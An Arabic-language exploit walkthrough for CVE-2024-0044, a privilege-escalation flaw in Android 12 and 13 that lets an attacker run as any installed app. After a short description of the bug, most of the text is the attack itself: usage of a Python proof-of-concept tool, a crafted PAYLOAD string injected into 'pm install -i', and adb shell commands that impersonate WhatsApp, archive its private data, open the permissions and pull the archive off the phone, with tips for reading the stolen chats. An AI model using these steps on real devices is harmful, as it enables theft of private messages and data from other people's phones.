
CVE-2024-0044: ثغرة أمنية عالية الخطورة من نوع "التنفيذ كأي تطبيق" تؤثر على إصدارَي Android 12 و13
تم تحديد CVE-2024-0044، في الدالة createSessionInternal في ملف PackageInstallerService.java، وهو ثغرة أمنية عالية الخطورة تؤثر على إصدارات Android 12 و 13. تسمح هذه الثغرة للمهاجم بتنفيذ هجوم "run-as any app"، مما يؤدي إلى تصعيد الامتيازات محليًا دون الحاجة إلى تفاعل المستخدم. تنشأ المشكلة بسبب التحقق غير السليم من المدخلات داخل الدالة createSessionInternal. يمكن للمهاجم استغلال ذلك عن طريق التلاعب بعملية إنشاء الجلسة، مما قد يمنحه وصولًا غير مصرح به إلى البيانات الحساسة وتنفيذ إجراءات غير مصرح بها على الجهاز المتأثر.
تم اكتشاف الثغرة بواسطة Meta security
تم تلخيص وإثبات المفهوم ومشاركته بواسطة Tiny hack
يمكن العثور على تفاصيل التصحيح الأمني في نشرة أمان Android
python3 cve_2024_0044.py -h
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#
usage: cve_2024_0044.py [-h] -P P -A A
CVE-2024-0044: run-as any app @Pl4int3xt
options:
-h, --help show this help message and exit
-P P package name (default: None)
-A A apk file path (default: None)
-P يُستخدم لتحديد اسم الحزمة الهدف التي تريد تشغيلها كـ
-A لتحديد مسار ملف apk لدفعه إلى الجهاز
قم بتشغيل الأداة
python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk
سيتم إنشاء ملف payload.txt مثل هذا
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success بعد الأمر الأخيرpl4int3xt ~> adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success
pixel:/ $ mkdir /data/local/tmp/wa/
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp
أنشئ دليلًا مؤقتًا: mkdir /data/local/tmp/wa/
أنشئ عنصرًا نائبًا لملف tar: touch /data/local/tmp/wa/wa.tar
اضبط أذونات مفتوحة بالكامل: chmod -R 0777 /data/local/tmp/wa/ لضمان أن أي مستخدم يمكنه القراءة والكتابة والتنفيذ داخل هذا الدليل.
بدّل سياق المستخدم: run-as victim للحصول على نفس أذونات مستخدم "victim".
أرشفة بيانات التطبيق الهدف: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp، لإنشاء أرشيف tar لدليل بيانات واتساب.
adb pull /data/local/tmp/wa/wa.tar
يمكنك استخراج البيانات باستخدام 7z أو أي أداة أخرى
يمكنك استخدام Whatsapp chat exporter لتحويلها إلى HTML
يتيح لك ذلك الحصول على بيانات واتساب دون الحصول على صلاحيات الجذر على جهازك.